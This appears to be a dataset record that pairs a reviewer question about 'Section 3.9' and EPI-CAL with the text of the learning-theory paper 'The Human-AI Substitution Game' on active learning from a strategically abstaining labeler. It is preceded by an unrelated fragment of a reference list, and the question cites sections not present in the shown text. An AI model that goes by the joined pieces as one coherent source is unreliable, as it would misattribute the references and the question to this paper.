10.18653/v1/2021.emnlp-main.468. URL https://aclanthology.org/2021.emnlp-main.468 Raquel Aoki, Frederick Tung, and Gabriel L. Oliveira. Heterogeneous multi-task learning with expert diversity. IEEE/ACM Transactions on Computational Biology and Bioinformatics, pp. 1–1, 2022. doi: 10.1109/tcbb.2022.3175456. URL https://doi.org/10.1109%2Ftcbb.2022.3175456 Kumar Ayush, Burak Uzkent, Chenlin Meng, Kumar Tanmay, Marshall Burke, David B. Lobell, and Stefano Ermon. Geography-aware self-supervised learning. CoRR, abs/2011.09980, 2020. URL https://arxiv.org/abs/2011.09980 Roman Bachmann, David Mizrahi, Andrei Atanov, and Amir Zamir. Multimae: Multi-modal multi-task masked autoencoders, 2022. Bernhard Bauer-Marschallinger, Senmao Cao, Claudio Navacchi, Vahid Freeman, Felix Reuß, Dirk Geudtner, Björn Rommen, Francisco Ceba, Paul Snoeij, Evert Attema, Christoph Reimer, and Wolfgang Wagner. The normalised sentinel-1 global backscatter model, mapping earth’s land surface with c-band microwaves. Scientific Data, 8, 10 2021. doi: 10.1038/s41597-021-01059-7. Keumgang Cha, Junghoon Seo, and Yeji Choi. Contrastive multiview coding with electro-optics for SAR semantic segmentation. CoRR, abs/2109.00120, 2021. URL https://arxiv.org/abs/2109.00120 Xinlei Chen, Haoqi Fan, Ross B. Girshick, and Kaiming He. Improved baselines with momentum contrastive learning. CoRR, abs/2003.04297, 2020. URL https://arxiv.org/abs/2003.04297 Yuxing Chen and Lorenzo Bruzzone. Self-supervised sar-optical data fusion of sentinel-1/-2 images. IEEE Transactions on Geoscience and Remote Sensing, 60:1–11, 2022. doi: 10.1109/TGRS.2021.3128072. Zitian Chen, Yikang Shen, Mingyu Ding, Zhenfang Chen, Hengshuang Zhao, Erik Learned-Miller, and Chuang Gan. Mod-squad: Designing mixture of experts as modular multi-task learners, 2022. Zewen Chi, Shaohan Huang, Li Dong, Shuming Ma, Bo Zheng, Saksham Singhal, Payal Bajaj, Xia Song, Xian-Ling Mao, Heyan Huang, and Furu Wei. XLM-E: Cross-lingual language model pre-training via ELECTRA. In Proceedings of the 60th Annual Meeting of the Association for Computational Linguistics (Volume 1: Long Papers), pp. 6170–6182, Dublin, Ireland, May 2022. Association for Computational Linguistics. doi: 10.18653/v1/2022.acl-long.427. URL https://aclanthology.org/2022.acl-long.427 Gordon Christie, Neil Fendley, James Wilson, and Ryan Mukherjee. Functional map of the world, 2018. Yezhen Cong, Samar Khanna, Chenlin Meng, Patrick Liu, Erik Rozi, Yutong He, Marshall Burke, David B Lobell, and Stefano Ermon. Satmae: Pre-training transformers for temporal and multi-spectral satellite imagery. arXiv preprint arXiv:2207.08051, 2022. Alexis Conneau, Kartikay Khandelwal, Naman Goyal, Vishrav Chaudhary, Guillaume Wenzek, Francisco Guzmán, Edouard Grave, Myle Ott, Luke Zettlemoyer, and Veselin Stoyanov. Unsupervised cross-lingual representation learning at scale, 2020.
s5hSp7EdL3
What is the purpose of Section 3.9? The authors say that this section is to compare with EPI-CAL, but only give a formal result for EPI-CAL ($\\Omega(\\sqrt{m})$ samples in Proposition 3.9) and didn't give any formal result for the algorithm they proposed for comparison.
THE HUMAN-AI SUBSTITUTION GAME: ACTIVE LEARNING FROM A STRATEGIC LABELER Tom Yan Machine Learning Department Carnegie Mellon University [email protected] Chicheng Zhang Department of Computer Science University of Arizona [email protected] ABSTRACT The standard active learning setting assumes a willing labeler, who provides labels on informative examples to speed up learning. However, if the labeler wishes to be compensated for as many labels as possible before learning finishes, the labeler may benefit from actually slowing down learning. This incentive arises for instance if the labeler is to be replaced by the ML model once it is trained. In this paper, we initiate the study of learning from a strategic labeler, who may abstain from labeling to slow down learning. We first prove that strategic abstention can prolong learning, and propose a novel complexity measure and representation to analyze the query complexity of the learning game. Next, we develop a near-optimal deterministic algorithm, prove its robustness to strategic labeling, and contrast it with other active learning algorithms. We also analyze extensions that encompass more general learning goals and labeler assumptions. Finally, we characterize the query cost of multi-task active learning, with and without abstention. Our first exploration of strategic labeling aims to consolidate our theoretical understanding of the imitative nature of ML in human-AI interaction. 1 INTRODUCTION Over the past few years, the rapid growth of Machine Learning (ML) capabilities has raised the possibility of wide-ranging automation, and consequent worker replacement. Taking a step back from when these ML models are phased in, we ask a basic question on how they first come about: Where will the training data for these ML models come from? In many industries, domain-specific knowledge is required to perform the job. Much of this expertise is proprietary (e.g. trade secrets), and not made publicly available (e.g. on the internet). Thus, in these industries, the answer to our question is paradoxically that: the training data can only come from the workers themselves. At this point, we arrive at a clear conflict of interest. On the one hand, corporations wish to automate tasks through ML models. On the other hand, the data needed to train these models can only come from the domain experts — the workers in this case, who know full well that these models, when trained, will go on to replace them at their jobs. Thus, this raises the possibility that we may see workers actually aim to slow down learning, in order to delay replacement and be compensated for as many labels as possible before then. We note that the idea of AI job displacement is no longer a rarefied topic, entertained only in academia. The possibility of AI displacement has been written about in recent articles (Benson, 2023), and even surfaced in labor union negotiations. In May 2023, Hollywood screenwriters went on strike to negotiate a better deal. One part of their demands is for there to be limits on companies being able to train ML models on the scripts produced by the writers themselves (WGA, 2023). Indeed, without this protection, companies can train AI models to emulate and write as well as the writers, eventually replacing them with the trained models. In sum, we believe it is now high time to develop our understanding of the replacement aspect of learning, which is what we set out to do in this paper. Remark: Before moving on, we point out that the conflict of interest described above is fairly general, and arises whenever the labeler wishes to maximize payment from labeling. Consider more broadly the interaction between any data provider (e.g. a data labeling company) and learner (e.g. company needing ML models). The more informative the data labeled by the provider, the faster the learner learns, the fewer the examples the learner needs to query the provider and the lower the provider’s subsequent payment. The AI automation setting we describe is one of many such instances where the labeler’s objective is at odds with that of the learner: the labelers has the incentive to slow down learning, to maximize their compensation from labeling before the models are fully trained and render their labeling expertise redundant. In this paper, we study the learning game that arises when the labeler and learner’s objective are at odds. The learner wants to learn quickly, but the labeler wants the learning to progress slowly. Notably, this requires departing from the standard assumption in learning theory that the labeler readily labels any example queried (including the informative examples). We term this game the Human-AI Substitution game, since typically the labeler is human and the more the model is trained, the less the learner needs the labeler (to label). To study the rate of learning, we turn to theory to analyze how the labeler can slow down learning. Our Contributions: In Section 2, we formalize the learning game and game value, developing a novel representation of the game state — effective version space (henceforth abbreviated as E-VS). In Section 3, we then develop a natural, efficient learning Algorithm 2, which we prove achieves near-optimal minimax query complexity. We also show that other AL algorithms may be inefficient. In Section 4, we examine more general settings involving noisy or non-strategic labelers, showing that our algorithm can nevertheless achieve good query complexity. Finally, in Section 5, we consider the multi-task setting and analyze when strategic labeling can further enlarge the learner’s query complexity beyond the sum of the individual tasks’ query complexities. 1.1 ACTIVE LEARNING WITH A SIMPLE TWIST We begin our investigation by adopting the standard active learning setup (Hanneke et al., 2014), with the only twist that the labeler aims to maximize the learner’s query cost. We focus on perhaps the most fundamental setting: exact learning through membership queries (Angluin, 1988; Hegedüs, 1995). As we will see, this setup is fairly general, and one may use standard reductions to reduce the PAC and noisy setting to this setting. Setup of the Learning Game: - The learner is interested in learning a hypothesis $h^*$ in hypothesis class $\mathcal{H} \subset (\mathcal{X} \rightarrow \{+1, -1\})$ over a finite pool of unlabeled data $\mathcal{X}$, collected by the learner. - The labeler knows $h^*$ and responds using labeling strategy $T$ with response $T(x) \in \{h^*(x), \bot\}$, where $\bot$ denotes abstention.\footnote{In Section 2.2 and Appendix B, we also study a variant of the game (Protocol 4), where the labeler can choose to reveal binary labels or abstain adaptively.} - The learner repeatedly interacts with the labeler adaptively, and makes label queries on unqueried example $x$, and incurs cost $1(T(x) \neq \bot)$ for each such query.\footnote{Note that we define the cost for all non-abstention label feedback to be 1 for all $x$. However, as we show in Appendix C, our algorithm can generalize to handle varying data prices (price for non-abstention label feedback $c(x)$ can be dependent on feature $x$).} In this paper, we model the labeler as being able to strategically abstain on queried data, to slow down learning. Being the domain expert with specialized expertise, the labeler is assumed to be able to use this leverage to selectively decide which data points to label. As noted in Section 1, some data points are particularly informative, and naturally the labeler would wish to decline labeling these so that more data would need to be labeled. We also add that this strategy of slowing down the transfer of expertise is not a novel conception. It has been well-documented that in apprenticeships, for instance, teachers (master) strategically slow down the training of their apprentices (Garicano & Rayo, 2017). The interaction finishes when the termination condition is met, or the learner’s querying strategy halts. Based on the learner’s desired learning outcome, the termination condition is defined as when $h^* \in \mathcal{H}$ is identified, which we formalize in the following section. If the termination condition is met, the labeler gets a payoff of 1 for every labeled data provided. If the termination condition is not met, the labeler gets a payoff of 0. In this game, the learner aims to minimize the total payoff needed to learn $h^*$, while the labeler aims for the opposite and to maximize the total payoff. Protocol 1 Human-AI Substitution game interaction protocol Require: Instance domain \( \mathcal{X} \), hypothesis class \( \mathcal{H} \), queried examples \( S_X \), queried dataset \( S \) 1: \( V \leftarrow \mathcal{H}, S_X \leftarrow \emptyset, S \leftarrow \emptyset \) 2: Nature chooses some \( h^* \in \mathcal{H} \) given to the labeler \( \triangleright \) Throughout, labeler maintains that \( h^* \) is identifiable: \( h^* \in E(V, S_X) \). 3: while \( |E(V, S_X)| \geq 2 \) do 4: Learner adaptively queries example \( x \in \mathcal{X} \setminus S_X \) using learning algorithm \( \mathcal{A} \) 5: Labeler adaptively gives label feedback \( y \in \{h^*(x), \bot\} \) using labeling oracle \( T \) 6: Learner updates the VS: \( V \leftarrow V[(x, y)] \) \( \triangleright \) Recall Definition 2.1 7: \( S_X \leftarrow S_X \cup \{x\}, S \leftarrow S \cup \{(x, y)\} \) 8: if \( |E(V, S_X)| = 1 \) then 9: Learner makes total payment to the labeler: \( \sum_{(x_i, y_i) \in S} \mathbb{I}\{y_i \neq \bot\} \) Guaranteeing Learning Outcome: Before proceeding, we note that the labeler can always satisfy the learner’s objective — by using the non-strategic labeling strategy \( T(x) = h^*(x) \) as in the standard active learning setup. Since the labeler can realize the learning outcome, we assume that the learner has this guarantee (of the learning outcome) written into the contract; no payment is awarded otherwise. Indeed, if the labeler cannot guarantee the learning outcome, it seems unlikely that the learner would have chosen to contract the labeler in the first place. Prolonging Learning through Abstention: The key tension in this interaction is that the labeler has to label in order to be paid, but any labeling results in less data that subsequently need to be labeled. With the labeler only allowed to abstain besides labeling, it is natural to ask: can abstention significantly enlarge the query complexity? Our investigation is motivated by the affirmative answer below, where we find that abstention can exponentially enlarge query complexity in some settings. Proposition 1.1 (Abstention induces exponentially higher query complexity). There exists a hypothesis class \( \mathcal{H} \), instance domain \( \mathcal{X} \) such that: the query complexity is \( O(\log |\mathcal{X}|) \) if the labeler is unable to abstain, and \( \Omega(|\mathcal{X}|) \) for any learning algorithm if the labeler is allowed to abstain. 2 THE MINIMAX LEARNING GAME 2.1 REPRESENTATION OF THE LEARNING GAME STATE To study this learning game, we first develop a useful, succinct representation of the game state, which is a key contribution of our paper and allows us to formalize the termination condition and the protocol. We start by defining the canonical state representation used in conventional AL without abstention, the version space (VS) [Mitchell 1982]. Definition 2.1. Given a queried dataset \( S \) and a set of hypotheses \( V \), define version space \( V[S] = \{ h \in V : \forall (x, y) \in S \land y \neq \bot, h(x) = y \} \) as the subset of hypotheses in \( V \) consistent with \( S \). In our setting of learning with strategic abstention, some queried examples in \( S \) will not have their binary labels available to the learner, due to the labeler’s abstention. And so, we observe that certain hypotheses may be consistent, but indistinguishable from other hypotheses, even if all the remaining unqueried data is labeled. This motivates defining a new notion of identifiability of a hypothesis under queried dataset \( S \). Let the set of all queried examples be \( S_X = \{ x : (x, y) \in S \} \). Definition 2.2. Given the set of queried examples and their label responses \( S \), and the queried examples \( S_X \), hypothesis \( h \in \mathcal{H} \) is said to be identifiable with respect to \( S \) if: | \( \mathcal{X} \) | \( x_1 \) | \( x_2 \) | \( x_3 \) | |---|---|---|---| | \( h_1 \) | +1 | -1 | +1 | | \( h_2 \) | -1 | -1 | +1 | | \( h_3 \) | +1 | +1 | -1 | | \( h_4 \) | -1 | +1 | -1 | | \( h_5 \) | +1 | +1 | +1 | Table 1: Consider an example hypothesis class \( \mathcal{H} = \{h_1, h_2, h_3, h_4, h_5\} \) and instance space \( \mathcal{X} = \{x_1, x_2, x_3\} \). The interaction history is \( S = \{(x_1, \bot)\} \), and therefore \( S_X = \{x_1\} \). Under \( S \), we have that the VS (Definition 2.1), \( V = \mathcal{H}[S] = \{h_1, h_2, h_3, h_4, h_5\} \). We observe that \( h_1 \) and \( h_2 \) make identical predictions on \( \mathcal{X} \setminus S_X = \{x_2, x_3\} \). Likewise, \( h_3 \) and \( h_4 \) make identical predictions on \( \mathcal{X} \setminus S_X \). Therefore, effective version space is actually \( E(V, S_X) = \{h_5\} \). If the game reaches this stage, the learner can already identify that the target \( h^* \) must be \( h_5 \). • \( h \) is consistent with \( S \), \( h \in H[S] \). • for all other consistent \( h' \in H[S]: h'(X \setminus S_X) = h(X \setminus S_X) \implies h' = h \), where for brevity we denote \( h_1(U) = h_2(U) \iff \forall x \in U \cdot h_1(x) = h_2(x) \). In other words, \( h \) is identifiable with respect to \( S \) if over the remaining examples \( X \setminus S_X \), some labeling strategy (specifically, one that reveals \( h(x) \) on every \( x \in X \setminus S_X \)) allows \( h \) to be distinguished from all other hypotheses in \( H[S] \). With this, we may develop a new representation of the state of the game, effective version space (E-VS). The E-VS is a refinement of VS, and comprises of only identifiable hypotheses given the examples queried. Please see Table 1 for an illustration. **Remark:** The key insight here is that abstention can in fact reveal information. This is despite that abstention is used by the labeler to prevent releasing information about \( h^* \). The reason why one can glean information from labeler’s abstention is that hypotheses could be rendered unidentifiable by abstention on a data point, and thus be ruled out without needing further queries. We operationalize this insight to develop the effective version space representation, which we formalize below. **Definition 2.3.** Given a set of classifiers \( V \) and a set of examples \( S_X \), define \[ E(V, S_X) = \{ h \in V : \forall h' \in V \setminus \{ h \} : h'(X \setminus S_X) \neq h(X \setminus S_X) \} \] as the effective version space with respect to \( V \) and \( S_X \). **Definition 2.4.** \( h^* \in H \) is identified by queried dataset \( S \) if the E-VS, \( E(H[S], S_X) = \{ h^* \} \). With the identification criterion defined, we now formalize the interaction in Protocol 1. Here, the termination states are defined as either \( |E(V, S_X)| = 1 \) (a hypothesis is identified and the learning outcome is met), or \( E(V, S_X) = \emptyset \) (no hypothesis can be identified). ### 2.2 THE MINIMAX LEARNING GAME In this paper, we analyze the minimax query complexity — that of the worst-case \( h^* \in H \) to learn under Protocol 1. Towards this, we formulate a related minimax learning game (see Protocol 4 in Appendix B), where both the learner queries and the labeler labels adaptively, depending on the interaction in previous rounds, with the game’s optimal value function defined as follows: \[ \text{Cost}(V, S_X) = \begin{cases} -\infty & E(V, S_X) = \emptyset \\ 0 & |E(V, S_X)| = 1 \\ \min_{x \in X \setminus S_X} \max_{y \in Y} (\mathbb{I}(y \neq \bot) + \text{Cost}(V[(x, y)], S_X \cup \{ x \})) & |E(V, S_X)| \geq 2 \end{cases} \] Compared to the original Protocol 1, Protocol 4 can be viewed as giving the labeler more freedom: the labeler does not need to commit to provide binary labels using a given \( h^* \); it just needs to maintain the invariant that there is some \( h^* \) identifiable and consistent with all examples seen. As we will see shortly, the optimal value function Cost of Protocol 4 serves as a useful tool in analyzing the optimal query complexity of Protocol 1. In the case of non-identifiability, we use a base-case payoff of \(-\infty\) to encode that the labeler must ensure identification. As noted in Section 1, any optimal labeler will never end up in such a state, because a positive payoff can always be achieved – the strategy \( T = h^* \) results in a positive payoff. We now turn to formalizing what an identifiable strategy is. **Definition 2.5.** Given \( h \in H \), define the set of labeling oracles consistent with \( h \), as: \[ T_h = \{ T : X \to \{+1, -1, \bot\} | \forall x \in X \ s.t \ T(x) \neq \bot, T(x) = h(x) \}. \] For subset \( S_X \subseteq X \), let \( T(S_X) = \{(x, T(x)) : x \in S_X \} \) be the labeled (binary or abstention) examples provided by labeling oracle \( T \) on the examples \( S_X \). **Definition 2.6.** A labeling strategy \( T \in T_h \) is an identifiable oracle if the VS, \( H[T(X)] = \{ h \} \). In the learning game, the labeler’s strategy is some labeling oracle, while the learner’s strategy corresponds to some deterministic querying algorithm: \( A : (X \times Y)^* \to X \), where \( Y = \{+1, -1, \bot\} \). Define \( \text{Cost}_A(T)(V, S_X) \) to be value of the learning game under querying strategy \( A \) and labeling strategy \( T \). The key result of this subsection is that the game value \( \text{Cost}(H, \emptyset) \) can serve as a useful measure of minimax query complexity. \( \text{Cost}(H, \emptyset) \) lower bounds the worst-case query complexity of any deterministic learning algorithm in Protocol 1. Proposition 2.7. For any deterministic, exact learning algorithm \( A \), \[ \max_{h \in H, T \in T_h} \text{Cost}_{A,T}(H, \emptyset) \geq \text{Cost}(H, \emptyset) \] This means that for every exact learning algorithm \( A \), there is some worst-case labeling oracle \( T_h \) that induces at least \( \text{Cost}(H, \emptyset) \) cost. Please see Appendix B for all proofs in this section. 3 E-VS Bisection Algorithm Analysis In this section, we design a natural and efficient algorithm based on E-VS bisection, Algorithm 2, which we prove achieves query complexity \( O(\text{Cost}(H, \emptyset) \ln |H|) \). Proving this guarantee allows us to use the lower bound result, Proposition 2.7, from the previous section to conclude that Algorithm 2’s minimax query complexity is optimal up to log factors. Towards analyzing the algorithm performance (and inspired by a related measure in Hanneke (2006) for the conventional non-abstention setting), we first introduce a new complexity measure named global identification cost (GIC), that will allow us to bridge Algorithm 2’s performance to Cost. Definition 3.1. Given \( H, X \), define the global identification cost of \( V \subset H \), instance set \( S_X \) as: \[ \text{GIC}(V, S_X) = \min \{ t \in \mathbb{N} : \forall T : X \setminus S_X \rightarrow \{+1, -1, \bot\}, \\ \exists \Sigma \subseteq X \setminus S_X \text{ s.t. } \sum_{x \in \Sigma} \mathbb{I}(T(x) \neq \bot) \leq t \land |E(V[T(\Sigma)], S_X \cup \Sigma)| \leq 1 \}. \] Intuitively, GIC represents the worst-case sample complexity of a clairvoyant querying algorithm that knows ahead of time the labeling oracle that is used by the labeler. The key lemma behind the analysis of Algorithm 2 is that there always exists a point that significantly bisects the current E-VS, resulting a size reduction of at least a constant \( \left( 1 - \frac{1}{\text{GIC}(V, S_X)} \right) \) factor. This justifies greedily querying the point that maximally bisects the E-VS. Lemma 3.2. For any \( V, S_X \) such that \( \text{GIC}(V, S_X) \) is finite, \( \exists x \in X \setminus S_X \) such that: \[ \max_{y \in \{-1,+1\}} (|E(V[(x,y)], S_X \cup \{x\})| - 1) \leq (|E(V, S_X)| - 1) \left( 1 - \frac{1}{\text{GIC}(V, S_X)} \right). \] To analyze the algorithm’s query complexity, we lower bound \( \text{Cost}(V, S_X) \) by \( \text{GIC}(V, S_X) \). Lemma 3.3. For any \( V \subset H \) and \( S_X \subset X \): \( \text{GIC}(V, S_X) \leq \text{Cost}(V, S_X) \). With this, we can prove that Algorithm 2 a) has query complexity of \( O(\text{Cost}(H, \emptyset) \ln |H|) \); b) identifies \( h^* \) when the labeler’s labeling strategy is identifiable. Please see Appendix C for all the proofs. Theorem 3.4 (Algorithm 2’s query complexity guarantee). If Algorithm 2 interacts with a labeling oracle \( T \), then it incurs total query cost at most \( \text{GIC}(H, \emptyset) \ln |H| + 1 \leq \text{Cost}(H, \emptyset) \ln |H| + 1 \). Furthermore, if Algorithm 2 interacts with an identifiable oracle \( T \) consistent with some \( h^* \in H \), then it identifies \( h^* \). 3.1 Accessing the E-VS Algorithm 2 may be viewed as the E-VS variant of the well-known, VS bisection algorithm (Tong & Koller, 2001), an “aggressive” active learning algorithm that greedily queries the informative point that maximally bisects the VS. The canonical approach for accessing the VS is via sampling, by assuming access to a sampling oracle \( O \). For example, if \( H \) is linear, the VS is a single polytope and one can use a polytope sampler to evaluate and search for the point \( x \) that maximally bisects the VS. E-VS Structure: Maximal E-VS bisection point search is less straightforward by contrast. The following structural lemma shows that there exists a setting of linear hypothesis classes in \( \mathbb{R}^d \) with \( X \) and \( S \) such that the E-VS comprises of an exponential number of disjoint polytopes. This means that it is computationally intractable to access the E-VS as polytopes, if one is to use the sampling approach as in VS-bisection. Proposition 3.5. There exists an instance space \( X \subset \mathbb{R}^d \), a linear hypothesis class \( H \), and query response \( S \) such that the resultant E-VS comprises of an exponential in \( d \) number of disjoint polytopes. Algorithm 2 E-VS Bisection Algorithm Require: Data pool \( \mathcal{X} \), hypothesis class \( \mathcal{H} \) 1: \( V \leftarrow \mathcal{H}, S \leftarrow \emptyset \) ▷ VS, queried dataset 2: while \( |E(V, S_X)| \geq 2 \) and \( S_X \neq \mathcal{X} \) do 3: Query: ▷ Maximal E-VS bisection point \( x = \arg\min_{x \in \mathcal{X} \setminus S_X} \max_{y \in \{-1,+1\}} |E(V, S_X)|(x, y)| \) 4: Labeler \( T \) provides label response: \( y \in \{-1,+1,\bot\} \) 5: \( S \leftarrow S \cup \{(x,y)\} \) 6: if \( y \neq \bot \) then 7: \( V \leftarrow V \cup \{(x,y)\} \) 8: return \( h \), the unique element in \( E(V, S_X) \) Algorithm 3 Bisection Point Search Sub-routine Require: Unqueried examples \( U = \mathcal{X} \setminus S_X \), abstained examples \( S_\bot \), Version Space \( V \), sampling oracle \( O \) 1: for sample \( h \sim O(V) \) do 2: Construct \( Z_1 = \{(x,-h(x)) : x \in S_\bot\} \), \( Z_2 = \{(x,h(x)) : x \in \mathcal{X} \setminus S_\bot\} \) 3: Run C-ERM to obtain: \( \hat{h} \in \arg\min_{h' \in \mathcal{H}} \{\text{err}(h',Z_1) : \text{err}(h',Z_2) = 0\} \) 4: if \( \hat{h} \neq h \) then continue 5: else ▷ \( h \in E(V, S_X) \) in this case 6: \( r_x^- \leftarrow r_x^+ + 1 \) if \( h(x) = -1 \) else \( r_x^+ \leftarrow r_x^+ + 1 \) for \( x \in U \), \( n \leftarrow n + 1 \) 7: return \( x^* = \arg\min_{x \in U} |r_x^+/n - r_x^-/n| \) Towards tractable maximal E-VS bisection point search: To overcome this issue, we develop a novel, oracle-efficient method for accessing the E-VS. We observe that a structural property of the E-VS can be used to check membership given access to a constrained empirical risk minimization (C-ERM) oracle (Dasgupta et al., 2007). This allows us to design an oracle-efficient subroutine, Algorithm 3, for any general hypothesis class \( \mathcal{H} \), which we prove is sound. Definition 3.6. A constrained-ERM oracle for hypothesis class \( \mathcal{H} \), C-ERM, takes as input labeled datasets \( Z_1 \) and \( Z_2 \), and outputs a classifier: \( \hat{h} \in \arg\min_{h' \in \mathcal{H}} \{\text{err}(h',Z_1) : \text{err}(h',Z_2) = 0\} \), where for dataset \( Z \), \( \text{err}(h',Z) = \sum_{(x,y) \in Z} \mathbb{I}(h'(x) \neq y) \). Proposition 3.7. Given some \( h \in V \) and access to a C-ERM oracle, lines 2 to 7 in Algorithm 3 verifies whether \( h \in E(V, S_X) \), with one call to the oracle. 3.2 Comparing with the VS bisection algorithm Labeling without identifiability: An advantage of the E-VS algorithm is its robustness to strategic labeling. Theorem 3.4 states that the E-VS algorithm has provable guarantees, even when the labeler does not guarantee identification. By contrast, VS-bisection is not robust this way. To concretely compare the two, we construct a learning setup without identification, wherein Algorithm 2 incurs a much smaller number of samples. Theorem 3.8. There exists a \( \mathcal{H} \) and \( \mathcal{X} \) such that the number of labeled examples queried by the E-VS bisection algorithm is \( O(\log |\mathcal{X}|) \), while the VS bisection algorithm queries \( \Omega(|\mathcal{X}|) \) labels. Remark: The key observation here is that, by optimistically assuming identifiability (even when this is not guaranteed), Algorithm 2 can ensure a small query cost. It does so by using the E-VS cardinality to detect when the labeling strategy is non-identifiable and halt the interaction. Please refer to Appendix D for all proofs in these subsections and a comparison with EPI-CAL (Huang et al., 2016), a natural “mellow” active learning algorithm that can handle labeler abstentions. Additionally, please see Appendix I for some toy experiments based on synthetic data. 4 Extensions to Other Learning Settings The prior sections have assumed that the labeler (e.g., data labeling company) is resourcefully providing non-noisy, labeled data that exactly identifies \( h^* \). In this section, we examine a few ways in which the labeler (e.g., a human worker) may be imperfect in labeling, and extend our guarantees to show how the learner may learn in such settings. Indeed, it is possible for the labeler to abstain non-strategically simply due to uncertainty (or lack of knowledge) about the label. As we will see, Algorithm 2 will also allow for efficient learning with non-strategic, abstaining labelers. 4.1 Approximate Identifiability A relaxation of the goal of exact learning is PAC learning: learning some \( \hat{h} \) such that its error \( \Pr_{x \sim D}(\hat{h}(x) \neq h^*(x)) \leq \epsilon \) on distribution \( D \) supported on \( X \), with probability (w.p.) greater than \( 1 - \delta \). This learning goal can arise when the learner wishes to relax the learning outcome/termination criterion, or wishes to weaken the assumption that the labeler identifies \( h^* \), to only knowing a fairly accurate hypothesis \( \hat{h} \in H \). Reduction: To study the PAC setting, one may use the standard PAC to exact learning reduction (Vapnik, 1999). It is well known that PAC learning can be reduced to exact learning on a sub-sampled set, \( X^m \subseteq X \), of \( m = O\left( \frac{\text{VC}(H)}{\epsilon} (\ln \frac{1}{\epsilon} + \ln \frac{1}{\delta}) \right) \) i.i.d points from \( D \) (VC(H) denotes the VC dimension of \( H \)). Then, \( X^m \) partitions \( H \) into clusters of equivalent hypotheses. Let the projection of \( H \) on \( X^m \) be \( H_{X^m} = \{ h(X^m) : h \in H \} \). For \( y \in H_{X^m} \), a cluster \( C(y) \) of equivalent hypotheses may then be defined as \( C(y) = \{ h \in H : h(X^m) = y \} \). The reduction guarantees that, w.p. over \( 1 - \delta \) over the samples \( X^m \), identifying \( h^* \)'s cluster \( C(h^*(X^m)) \) suffices for finding \( \hat{h} \) with error \( \leq \epsilon \). Approximate Identification: Using this reduction, we may analyze the query complexity of approximate identification in the resulting learning game. In this game, the learner sets the data pool to be \( X^m \) (can be much smaller than \( X \)) and aims to only learn the cluster \( h^* \) belongs to, \( C(h^*(X^m)) \). We demonstrate how our E-VS representation can be adapted to apply Algorithm 2 in this approximate identification game. We first note that the original E-VS, defined over \( H \) and \( X^m \) will no longer suffice as state representation. Consider some \( h \in H \) such that \( |C(h(X^m))| \geq 2 \) with \( \{ h', h \} \subseteq C(h(X^m)) \). Then, \( h(X^m) = h'(X^m) \Rightarrow h'(X^m \setminus \emptyset) = h(X^m \setminus \emptyset) \), which results in the premature elimination of the entire \( C(h(X^m)) \) cluster at the very start. To address this, we define a refinement of E-VS, \( X^m \)-E-VS. This fix follows from observing that in this game, we should only consider non-identifiability with respect to hypotheses from other clusters. \[ E^{X^m}(V, S_X) = \{ h \in V : \forall h' \in V \setminus \{ \bar{h} : \bar{h}(X^m) = h(X^m), \bar{h} \in V \} : h'(X^m \setminus S_X) \neq h(X^m \setminus S_X) \} \] With this, we note that the \( X^m \)-E-VS bisection algorithm attains analogous near-optimal guarantees. Corollary 4.1. Consider Algorithm 2 instantiated with data pool \( X^m \) and state representation \( X^m \)-E-VS. When interacting with a labeling oracle \( T \), it incurs total query cost at most \( \text{GIC}^{X^m}(H, \emptyset) \ln |H| + 1 \) (see Definition 5.2). Furthermore, if the \( X^m \)-E-VS bisection algorithm interacts with an identifiable oracle \( T \) consistent with some \( h^* \in H \), then it identifies \( h^* \). The only remaining consideration is how to efficiently search for the point that maximally bisects clusters in \( X^m \)-E-VS. Here, we show that we may adapt the membership check implemented in Algorithm 5 (with the data pool set to \( X^m \)) to check hypothesis membership in the coarser \( X^m \)-E-VS. That is, we still have an oracle-efficient way of accessing the \( X^m \)-E-VS, without needing to explicitly compute and iterate through the clusters. Proposition 4.2. \( h \not\in E^{X^m}(V, S_X) \) iff \( \hat{h}(X^m) \neq h(X^m) \), where \( \hat{h} \) is the minimizer of the C-ERM output on Algorithm 3 Line 3 with \( X = X^m \). 4.2 Noised Labeling In some cases, a labeler can make honest mistakes simply due to human error. We can model this by assuming noised queries (Castro & Nowak, 2008): querying example \( x \) returns \( h^*(x) \) w.p. \( 1 - \delta(x) \), and \( -h^*(x) \) w.p. \( \delta(x) \). In this setup, we may use the common approach of repeatedly query a datum to estimate its label w.h.p. (e.g. as in Yan et al., 2016). This approach thus reduces the noised-label setting to cost-sensitive exact learning, where each \( x \) incurs differing cost \( c(x) \) dependent on \( \delta(x) \). In Appendix C, we prove the generalized version of the results in Section 3 that factors in example-based cost, showing that Algorithm 2 can be applied in this setting with near-optimal guarantees. 4.3 Arbitrary Labeling Thus far, we have assumed a labeler who can (approximately) identify \( h^* \). Here, we touch on when the labeler either does not know \( h^* \) (or \( h^* \)'s cluster), or myopically labels in a way that cannot guarantee the learning outcome. Since the labeler behaves arbitrarily, the learner now cannot be assured of any learning outcome guarantees. In this case, we note that the learner can use the E-VS to preemptively detect when the learning outcome cannot be realized, and halt the interaction. While the $h^*$ is unknown, it is possible to detect when no hypothesis/cluster is learnable. This is when the E-VS is empty, certifying that the labeler cannot realize the learning outcome. Here, our Theorem 3.4 provides guarantees on the maximum number of times that a non-identifiable oracle will be queried. **Corollary 4.3 (of Theorem 3.4).** Algorithm 2 guarantees bounded query complexity $\text{GIC}(\mathcal{H}, \emptyset) \ln |\mathcal{H}| + 1$ even when the labeling oracle is non-identifiable. Finally, we note that our algorithm is sound in that if the labeler can identify $h^*$, then our algorithm learns $h^*$. Thus, in summary, Algorithm 2 is both sample-efficient with respect to an identifiable labeler, and robust to a non-identifiable one. Please see Appendix E for more details on this section. ## 5 Multi-Task Learning from a Strategic Labeler **Multi-task setting:** In most jobs, workers in fact perform multiple roles. This motivates the study of multi-task exact learning from a strategic labeler, which we now outline: - The learner is now interested in learning multiple $h_i^* \in \mathcal{H}_i$, for tasks $i \in [n]$. Define learner’s hypothesis class $\mathcal{H} = \times_{i=1}^{n} \mathcal{H}_i$ which contains $h^* = (h_1^*, \ldots, h_n^*)$. The learner can query from instance domain $\mathcal{X} \subseteq \times_{i=1}^{n} \mathcal{X}_i$, where $\mathcal{X}_i$ is the instance domain for task $i$. - Labeler now provides multi-task labels $y \in \mathcal{Y}^n = \{+1, -1, \bot\}^n$, and for the label cost: i) One natural extension of the single task payoff is: $c_{one}(y) = 1(\exists i, y_i \neq \bot)$. ii) Another variant of the multi-task labeling payoff is: $c_{all}(y) = 1(\forall i, y_i \neq \bot)$. We are interested in asking: can the labeler use the multi-task structure to further amplify the query complexity? To answer this question, we relate 